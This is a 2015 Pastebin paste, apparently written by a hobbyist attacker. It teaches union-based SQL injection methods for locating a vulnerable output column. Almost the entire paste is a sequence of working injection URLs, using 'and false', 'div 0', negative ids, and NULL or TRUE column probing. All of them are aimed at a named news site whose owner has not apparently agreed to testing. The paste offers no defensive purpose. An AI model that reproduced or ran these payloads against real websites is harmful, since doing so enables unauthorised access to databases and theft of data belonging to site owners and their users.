API tools faq
paste
Advertisement
Kyfx

Solutions sqli

Kyfx
Jul 18th, 2015
446
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.29 KB | None | 0 0
raw download clone embed print report
  1. toDaY i am going to teach here all methods of showing vuln column which i know:::::
  2. Site- http://www.northernoutpost.com/news.php?id=17
  3. Steps::::
  4. http://www.northernoutpost.com/news.php?id=17+and+false+union+select+1,2,3,4,5,6,7,8--+
  5.  
  6. http://www.northernoutpost.com/news.php?id=17+and+0+union+select+1,2,3,4,5,6,7,8--+
  7.  
  8. http://www.northernoutpost.com/news.php?id=17+and+true+union+select+1,2,3,4,5,6,7,8--+ ==> Not showing vuln column it mean It Will not work here... but in some sites it will also work this methods are in condition......
  9.  
  10. http://www.northernoutpost.com/news.php?id=17+div+0+union+select+1,2,3,4,5,6,7,8--+
  11.  
  12. http://www.northernoutpost.com/news.php?id=17+div+false+union+select+1,2,3,4,5,6,7,8--+
  13.  
  14. http://www.northernoutpost.com/news.php?id=17+div+true+union+select+1,2,3,4,5,6,7,8--+ ===> This condition is not working here......
  15.  
  16. http://www.northernoutpost.com/news.php?id=17+and+1=0+union+select+1,2,3,4,5,6,7,8--+
  17.  
  18. http://www.northernoutpost.com/news.php?id=17+and+1=2+union+select+1,2,3,4,5,6,7,8--+
  19.  
  20. http://www.northernoutpost.com/news.php?id=17/0+union+select+1,2,3,4,5,6,7,8--+
  21.  
  22. http://www.northernoutpost.com/news.php?id=17/false+union+select+1,2,3,4,5,6,7,8--+
  23.  
  24. http://www.northernoutpost.com/news.php?id=.17+union+select+1,2,3,4,5,6,7,8--+
  25.  
  26. http://www.northernoutpost.com/news.php?id=1.7+union+select+1,2,3,4,5,6,7,8--+
  27.  
  28. Now i will show by changing parameter::::
  29.  
  30. http://www.northernoutpost.com/news.php?id=999999+and+false+union+select+1,2,3,4,5,6,7,8--+
  31.  
  32. http://www.northernoutpost.com/news.php?id=NULL+union+select+1,2,3,4,5,6,7,8--+ ======> This all method will not work only some will work and some will not work it is just a condition so...... Here this is also not working.....
  33.  
  34. http://www.northernoutpost.com/news.php?id=11111+and+false+union+select+1,2,3,4,5,6,7,8--+
  35.  
  36. So now this method will show yOu by changing COLUMN number
  37.  
  38.  
  39. http://www.northernoutpost.com/news.php?id=-17+union+select+1111,2222,3333,4444,5555,6666,7777,8888--+
  40. ===> When you put this you will get vuln column in source just make sure there is one invalid image when you put this::::
  41.  
  42. http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,2,3,4,5,6,7,8--+
  43.  
  44. http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,3,4,5,6,7,8--+
  45.  
  46. http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,NULL,4,5,6,7,8--+
  47.  
  48.  
  49. http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,Null,5,6,7,8--+
  50.  
  51. http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,Null,NULL,NULL,6,7,8--+
  52.  
  53. http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,5,NULL,7,8--+
  54.  
  55. http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,Null,NULL,NULL,NULL,NULL,8--+
  56.  
  57. http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,Null,NULL,NULL,NULL--+ (in this method try to put null in every column then when Null work in 2 column then it will show vuln column 2 and when null in 4 if it's work here vuln column will in 4 or if null in 7 and giving result then vuln column is 7)
  58.  
  59. http://www.northernoutpost.com/news.php?id=-17+union+select+TRUE,2,3,4,5,6,7,8--+
  60.  
  61. http://www.northernoutpost.com/news.php?id=-17+union+select+1,TRUE,3,4,5,6,7,8--+
  62.  
  63. http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,TRUE,4,5,6,7,8--+
  64.  
  65. http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,TRUE,4,5,6,7,8--+
  66.  
  67. http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,TRUE,5,6,7,8--+
  68.  
  69. http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,TRUE,6,7,8--+
  70.  
  71. http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,5,TRUE,7,8--+
  72.  
  73. http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,5,6,TRUE,8--+
  74.  
  75. http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,5,6,7,TRUE--+ (this method is also just like NULL ONE)
  76.  
  77.  
  78. http://www.northernoutpost.com/news.php?id=-17+union+(select+1,2,3,4,5,6,7,8)--+
  79.  
  80. http://www.northernoutpost.com/news.php?id=-17+union+(select+(1),(2),(3),(4),(5),(6),(7),(8))--+
  81.  
  82. http://www.northernoutpost.com/news.php?id=-17+union+select+~1,~2,~3,~4,~5,~6,~7,~8--+
  83.  
  84. #HOPE YOU UNDERSTAND
  85. #SORRY FOR MY BAD ENGLIS#
  86. #AND HERE MAY BE I FORGET TO MENTION SOME METHOD IF ANY METHOD IS MISSING THEN YOU CAN TELL ME OR ANY PROBLEM YOU CAN ASK ME::::: www.facebook.com/bikashpoudel66
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!